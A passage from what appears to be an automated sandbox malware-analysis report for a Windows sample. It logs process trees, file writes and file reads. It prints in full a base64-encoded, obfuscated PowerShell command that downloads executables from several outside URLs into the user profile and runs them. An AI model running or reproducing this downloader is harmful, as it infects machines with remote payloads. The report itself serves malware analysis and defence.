KAAnAC8AJwArACcAcwBjACcAKQArACcAaABhACcAKwAoACcAaQBkACcAKwAn AGwAJwApACsAKAAnAC4AZAAnACsAJwBlACcAKQArACcALwBiACcAKwAoACcA aQBsAGQAJwArACcAZQByAC8AJwApACsAJwBrACcAKwAnAGMAMQAnACsAKAAn AHIAcwA0ACcAKwAnADcAJwArACcANAA2ACcAKQArACcANQA3ACcAKwAnAC8A KgAnACsAKAAnAGgAdAAnACsAJwB0AHAAOgAnACkAKwAoACcALwAnACsAJwAv AHMAJwApACsAKAAnAGEAJwArACcAdQBlAHIAYgBlAGMAawAuACcAKwAnAG4A JwArACcAZQB0AC8AYwBnAGkALQAnACkAKwAnAGIAJwArACcAaQAnACsAJwBu ACcAKwAnAC8ATQAnACsAKAAnAFcAJwArACcAUgBPAGkAcwBHAFUARAAnACsA JwBwACcAKwAnAEIALwAqAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACsAKAAn ADoALwAvACcAKwAnAHMAJwApACsAKAAnAGMAJwArACcAaABhACcAKQArACgA JwBlACcAKwAnAGYAZQByACcAKQArACgAJwAtAGYAJwArACcAcgBhAG4AJwAr ACcAawAuAGQAJwApACsAKAAnAGUALwBjACcAKwAnAGcAaQAtAGIAaQBuACcA KwAnAC8AYwAnACkAKwAnAGIAJwArACgAJwBqACcAKwAnADUAcgAnACkAKwAn AG4AJwArACgAJwBxAG0ANgA1ACcAKwAnAHoAJwArACcAbQA4ADMAJwApACsA JwAxACcAKwAnADIALwAnACkALgAiAFMAYABwAEwAaQB0ACIAKABbAGMAaABh AHIAXQA0ADIAKQA7ACQAUgB1AGgAMAB0ADQAbAA9ACgAKAAnAFIAdAAnACsA JwBwACcAKQArACgAJwAxAGgAYgAnACsAJwAzACcAKQApADsAZgBvAHIAZQBh AGMAaAAoACQASwBjAG8ANABsADYAOQAgAGkAbgAgACQARgBpADgAaQBnAG8A YgApAHsAdAByAHkAewAkAFMAZQA1AHoAaAB0AG0ALgAiAEQAbwBXAGAATgBM AE8AYQBgAEQAZgBgAGkAbABFACIAKAAkAEsAYwBvADQAbAA2ADkALAAgACQA TABuAHgAcABoADkAbQApADsAJABPAHYAeQAwAHIAegBwAD0AKAAnAEkAcwAn ACsAKAAnAHkAJwArACcANABrAHMAZwAnACkAKQ7AEkAZgAgACgAKAAuACgAJ wBHAGUAdAAtACcAKwAnAEkAdABlACcAKwAnAG0AJwApACAAJABMAG4AeABwA GgAOQBtACkALgAiAEwAZQBuAGcAYABUAEgAIgAgAC0AZwBlACAAMgA1ADcAO AA2ACkAIAB7ACYAKAAnAEkAbgB2AG8AJwArACcAawBlAC0ASQAnACsAJwB0A GUAbQAnACkAKAAkAEwAbgB4AHAAaAA5AG0AKQA7ACQAQQA3AHoAegB6ADEAe QA9ACgAJwBMACcAKwAoACcAaQAnACsAJwBtAGIAMABfADQAJwApACkAOwBiA HIAZQBhAGsAOwAkAFUAaQA4AGQAaQB3AF8APQAoACgAJwBBAHgAYgBlACcAK wAnAHMAZgAnACkAKwAnAGcAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABEA DUAZwBnAGMAXwA3AD0AKAAnAEEAaAAnACsAKAAnAGEAJwArACcAcQBkACcAK QArACcAZwBuACcAKQA=' Imagebase: 0x1320000 File size: 232960 bytes MD5 hash: F3BDBE3BB6F734E357235F4D5898582D Has administrator privileges: false Programmed in: C, C++ or other language Reputation: high

File Activities

Analysis Process: conhost.exe PID: 6912 Parent PID: 6904

General

Start time: 15:00:47 Start date: 02/09/2020 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff66fd50000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has administrator privileges: false Programmed in: C, C++ or other language Reputation: high

Analysis Process: powershell.exe PID: 6956 Parent PID: 6904

General

Start time: 15:00:48 Start date: 02/09/2020 Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Wow64 process (32bit): true

Copyright null 2020 Page 13 of 16 Commandline: powersheLL -e JABFAHAAagA1ADgAOQBpAD0AKAAoACcAWABmADAAJwArA CcAaAAnACkAKwAoACcAcgAzACcAKwAnAGwAJwApACkAOwAuACgAJwBuAGUAd wAtACcAKwAnAGkAdABlAG0AJwApACAAJABlAE4AdgA6AFUAcwBlAFIAcABSA G8AZgBpAGwARQBcAFAAUwAyADkAQgA2AEMAXABMAFMAcQAzAEIAXwBMAFwAI AAtAGkAdABlAG0AdAB5AHAAZQAgAGQASQBSAEUAYwBUAG8AUgB5ADsAWwBOA GUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAX QA6ADoAIgBTAGUAQwBVAHIASQBgAFQAeQBQAFIAYABPAHQAYABPAGMAYABvA EwAIgAgAD0AIAAoACgAJwB0AGwAcwAnACsAJwAxADIALAAnACkAKwAnACAAJ wArACcAdAAnACsAKAAnAGwAcwAnACsAJwAxADEAJwApACsAJwAsACAAJwArA CgAJwB0ACcAKwAnAGwAcwAnACkAKQA7ACQASABfADgAagB0ADUAYwAgAD0AI AAoACgAJwBaACcAKwAnAHYAaAAnACkAKwAoACcANQAnACsAJwBlAGEAJwApA CsAJwBuAHYAJwApADsAJABSAF8AegBzAHYAMQBrAD0AKAAoACcAQgBjACcAK wAnAGQAdQBpACcAKQArACcAOAAnACsAJwB5ACcAKQA7ACQATABuAHgAcABoA DkAbQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAJ wA1AFQAJwArACgAJwB6ACcAKwAnAFAAJwArACcAcwAyADkAYgA2AGMAJwApA CsAJwA1ACcAKwAoACcAVAB6ACcAKwAnAEwAcwAnACkAKwAoACcAcQAzACcAK wAnAGIAJwArACcAXwBsADUAVAB6ACcAKQApACAAIAAtAEMAUgBFAFAATABBA EMAZQAoACcANQBUACcAKwAnAHoAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAK wAkAEgAXwA4AGoAdAA1AGMAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlA CcAKQApADsAJABMAGIANwA4ADYAcgB5AD0AKAAoACcAVgAzACcAKwAnAHEAN AAnACkAKwAoACcAcwAyACcAKwAnAGcAJwApACkAOwAkAFMAZQA1AHoAaAB0A G0APQAmACgAJwBuAGUAdwAnACsAJwAtAG8AYgBqACcAKwAnAGUAYwB0ACcAK QAgAE4ARQB0AC4AdwBFAEIAYwBMAGkAZQBOAHQAOwAkAEYAaQA4AGkAZwBvA GIAPQAoACcAaAAnACsAJwB0AHQAJwArACcAcAAnACsAJwA6AC8AJwArACgAJ wAvAHIAJwArACcAdQBlACcAKQArACcAYwBrACcAKwAnAGUAcgAnACsAKAAnA HQALQAnACsAJwBvACcAKQArACgAJwBuAGwAaQBuACcAKwAnAGUAJwArACcAL gBkACcAKQArACgAJwBlAC8AJwArACcAYwBnAGkAJwApACsAJwAtAGIAJwArA CgAJwBpAG4AJwArACcALwAnACkAKwAnAEsAJwArACgAJwByACcAKwAnAGgAN wBuAHIAJwArACcAMQA5ADcAOAAnACsAJwAvACoAJwApACsAJwBoACcAKwAnA HQAdAAnACsAJwBwACcAKwAoACcAcwA6ACcAKwAnAC8AJwApACsAJwAvACcAK wAoACcAcgB1AGIAJwArACcAZQBuAHcAJwApACsAKAAnAGkAbgAnACsAJwBrA GUAbABtACcAKQArACgAJwBhAG4ALgAnACsAJwBuACcAKwAnAGwALwBjACcAK QArACcAZwBpACcAKwAnAC0AJwArACcAYgBpACcAKwAoACcAbgAvACcAKwAnA GwAVQAnACkAKwAoACcASAAnACsAJwAvACoAaAB0ACcAKQArACcAdAAnACsAK AAnAHAAOgAnACsAJwAvACcAKQArACgAJwAvACcAKwAnAHIAdQBwAGUAcgAnA CkAKwAnAHQAJwArACgAJwBzAHQAJwArACcAcgBlACcAKQArACgAJwBlAHQAL gBkACcAKwAnAGUAJwApACsAJwAvACcAKwAnAEgAJwArACgAJwBlAGkAZABpA CcAKwAnAHMALQAnACkAKwAnAEUAJwArACgAJwB4ACcAKwAnAC8AYQB0AHQAY QAnACsAJwBjAGgALwB2ACcAKQArACcAQwAnACsAJwBGAFMAJwArACgAJwBhA GsAJwArACcAUABIAHEALwAqACcAKQArACcAaAAnACsAKAAnAHQAdABwADoAL wAvACcAKwAnAHMAYQAnACkAKwAnAG0AJwArACgAJwBhAHQAZQBjACcAKwAnA GgAJwApACsAKAAnAG4AaQBjACcAKwAnAHMAJwApACsAJwAuAGMAJwArACgAJ wBvAG0AJwArACcALwBfACcAKwAnAHMAYwByAGkAJwApACsAKAAnAHAAJwArA CcAdABzAC8ARAAnACkAKwAoACcAVwB4AGkAcAAnACsAJwB3AC8AJwArACcAK gBoACcAKQArACcAdAAnACsAKAAnAHQAJwArACcAcAA6ACcAKQArACcALwAnA CsAKAAnAC8AJwArACcAcwBjACcAKQArACcAaABhACcAKwAoACcAaQBkACcAK wAnAGwAJwApACsAKAAnAC4AZAAnACsAJwBlACcAKQArACcALwBiACcAKwAoA CcAaQBsAGQAJwArACcAZQByAC8AJwApACsAJwBrACcAKwAnAGMAMQAnACsAK AAnAHIAcwA0ACcAKwAnADcAJwArACcANAA2ACcAKQArACcANQA3ACcAKwAnA C8AKgAnACsAKAAnAGgAdAAnACsAJwB0AHAAOgAnACkAKwAoACcALwAnACsAJ wAvAHMAJwApACsAKAAnAGEAJwArACcAdQBlAHIAYgBlAGMAawAuACcAKwAnA G4AJwArACcAZQB0AC8AYwBnAGkALQAnACkAKwAnAGIAJwArACcAaQAnACsAJ wBuACcAKwAnAC8ATQAnACsAKAAnAFcAJwArACcAUgBPAGkAcwBHAFUARAAnA CsAJwBwACcAKwAnAEIALwAqAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACsAK AAnADoALwAvACcAKwAnAHMAJwApACsAKAAnAGMAJwArACcAaABhACcAKQArA CgAJwBlACcAKwAnAGYAZQByACcAKQArACgAJwAtAGYAJwArACcAcgBhAG4AJ wArACcAawAuAGQAJwApACsAKAAnAGUALwBjACcAKwAnAGcAaQAtAGIAaQBuA CcAKwAnAC8AYwAnACkAKwAnAGIAJwArACgAJwBqACcAKwAnADUAcgAnACkAK wAnAG4AJwArACgAJwBxAG0ANgA1ACcAKwAnAHoAJwArACcAbQA4ADMAJwApA CsAJwAxACcAKwAnADIALwAnACkALgAiAFMAYABwAEwAaQB0ACIAKABbAGMAa ABhAHIAXQA0ADIAKQA7ACQAUgB1AGgAMAB0ADQAbAA9ACgAKAAnAFIAdAAnA CsAJwBwACcAKQArACgAJwAxAGgAYgAnACsAJwAzACcAKQApADsAZgBvAHIAZ QBhAGMAaAAoACQASwBjAG8ANABsADYAOQAgAGkAbgAgACQARgBpADgAaQBnA G8AYgApAHsAdAByAHkAewAkAFMAZQA1AHoAaAB0AG0ALgAiAEQAbwBXAGAAT gBMAE8AYQBgAEQAZgBgAGkAbABFACIAKAAkAEsAYwBvADQAbAA2ADkALAAgA CQATABuAHgAcABoADkAbQApADsAJABPAHYAeQAwAHIAegBwAD0AKAAnAEkAc wAnACsAKAAnAHkAJwArACcANABrAHMAZwAnACkAKQ7AEkAZgAgACgAKAAuAC gAJwBHAGUAdAAtACcAKwAnAEkAdABlACcAKwAnAG0AJwApACAAJABMAG4AeA BwAGgAOQBtACkALgAiAEwAZQBuAGcAYABUAEgAIgAgAC0AZwBlACAAMgA1AD cAOAA2ACkAIAB7ACYAKAAnAEkAbgB2AG8AJwArACcAawBlAC0ASQAnACsAJw B0AGUAbQAnACkAKAAkAEwAbgB4AHAAaAA5AG0AKQA7ACQAQQA3AHoAegB6AD EAeQA9ACgAJwBMACcAKwAoACcAaQAnACsAJwBtAGIAMABfADQAJwApACkAOw BiAHIAZQBhAGsAOwAkAFUAaQA4AGQAaQB3AF8APQAoACgAJwBBAHgAYgBlAC cAKwAnAHMAZgAnACkAKwAnAGcAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJA BEADUAZwBnAGMAXwA3AD0AKAAnAEEAaAAnACsAKAAnAGEAJwArACcAcQBkAC cAKQArACcAZwBuACcAKQA= Imagebase: 0x1260000 File size: 430592 bytes MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10 Has administrator privileges: false Programmed in: .Net C# or VB.NET Reputation: high

File Activities

File Created Copyright null 2020 Page 14 of 16 Source File Path Access Attributes Options Completion Count Address Symbol C:\Users\user read data or list device directory file | object name collision 1 6DE0CF06 unknown directory | synchronous io synchronize non alert | open for backup ident | open reparse point C:\Users\user\AppData\Roaming read data or list device directory file | object name collision 1 6DE0CF06 unknown directory | synchronous io synchronize non alert | open for backup ident | open reparse point C:\Windows\system32\catroot read data or list device directory file | object name collision 1 6C8E5B28 unknown directory | synchronous io synchronize non alert | open for backup ident | open reparse point C:\Windows\system32\catroot2 read data or list device directory file | object name collision 1 6C8E5B28 unknown directory | synchronous io synchronize non alert | open for backup ident | open reparse point C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\Sta read attributes | device synchronous io success or wait 1 6DFD1926 CreateFileW rtupProfileData-Interactive synchronize | non alert | non generic write directory file

File Written

Source File Path Offset Length Value Ascii Completion Count Address Symbol C:\Users\user\AppData\Local\Mi unknown 64 40 00 00 01 65 00 00 @...e...... success or wait 1 6E0D76FC WriteFile crosoft\Windows\PowerShell\StartupProfileData-Interactive 00 00 00 00 00 0a 00 ...... 00 00 05 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 C:\Users\user\AppData\Local\Mi unknown 40 48 00 00 02 03 00 00 H...... <@.^...L."My.. success or wait 10 6E0D76FC WriteFile crosoft\Windows\PowerShell\StartupProfileData-Interactive 00 00 00 00 00 01 00 .:...... 00 00 3c 40 b0 5e e7 8d bf 4c b2 22 4d 79 98 9c a7 3a 03 00 00 00 0e 00 20 00 C:\Users\user\AppData\Local\Mi unknown 32 4d 69 63 72 6f 73 6f Microsoft.PowerShell.Cons success or wait 10 6E0D76FC WriteFile crosoft\Windows\PowerShell\StartupProfileData-Interactive 66 74 2e 50 6f 77 65 oleHost 72 53 68 65 6c 6c 2e 43 6f 6e 73 6f 6c 65 48 6f 73 74 C:\Users\user\AppData\Local\Mi unknown 1 00 . success or wait 7 6E0D76FC WriteFile crosoft\Windows\PowerShell\StartupProfileData-Interactive C:\Users\user\AppData\Local\Mi unknown 4 40 00 00 03 @... success or wait 1 6E0D76FC WriteFile crosoft\Windows\PowerShell\StartupProfileData-Interactive C:\Users\user\AppData\Local\Mi unknown 60 00 0e 80 00 01 0e 80 ...... success or wait 1 6E0D76FC WriteFile crosoft\Windows\PowerShell\StartupProfileData-Interactive 00 02 0e 80 00 03 0e ...... T.@..>@.G.@...@.. 80 00 04 0e 80 00 05 @@. 0e 80 00 06 0e 80 00 07 0e 80 00 08 0e 80 00 09 0c 80 00 54 01 40 00 f9 3e 40 01 47 01 40 00 da 00 40 00 0e 40 40 01

File Read

Source File Path Offset Length Completion Count Address Symbol C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config unknown 4095 success or wait 1 6DDE5705 unknown C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config unknown 8173 end of file 1 6DDE5705 unknown C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4095 success or wait 1 6DDE5705 unknown C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 6135 success or wait 1 6DDE5705 unknown C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4097 success or wait 1 6DDE5705 unknown C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4098 success or wait 1 6DDE5705 unknown

Copyright null 2020 Page 15 of 16 Source File Path Offset Length Completion Count Address Symbol C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 7976 success or wait 1 6DDE5705 unknown C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152 unknown 176 success or wait 1 6DD403DE ReadFile fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll.aux C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config unknown 4095 success or wait 1 6DDECA54 ReadFile C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config unknown 8173 end of file 1 6DDECA54 ReadFile C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4095 success or wait 1 6DDECA54 ReadFile C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 6135 success or wait 1 6DDECA54 ReadFile C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4097 success or wait 1 6DDECA54 ReadFile C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4098 success or wait 1 6DDECA54 ReadFile C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 7976 success or wait 1 6DDECA54 ReadFile C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f unknown 900 success or wait 1 6DD403DE ReadFile 1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7e unknown 620 success or wait 1 6DD403DE ReadFile efa3cd3e0ba98b5ebddbbc72e6\System.ni.dll.aux C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config unknown 4095 success or wait 1 6DDE5705 unknown C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config unknown 8173 end of file 1 6DDE5705 unknown C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config unknown 4095 success or wait 1 6DDE5705 unknown C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config unknown 8173 end of file 1 6DDE5705 unknown C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b2 unknown 748 success or wait 1 6DD403DE ReadFile 19d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf4 unknown 748 success or wait 1 6DD403DE ReadFile 9f6405#\ccc7c82770f93d1392abde4be3a80378\Microsoft.Management.Infrastructure.ni.dll.aux C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4095 success or wait 1 6DDE5705 unknown C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 6135 success or wait 1 6DDE5705 unknown C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4097 success or wait 1 6DDE5705 unknown C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4098 success or wait 2 6DDE5705 unknown C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 7976 success or wait 1 6DDE5705 unknown C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4121 success or wait 1 6DDE5705 unknown C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4253 success or wait 1 6DDE5705 unknown C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 8171 end of file 1 6DDE5705 unknown

Disassembly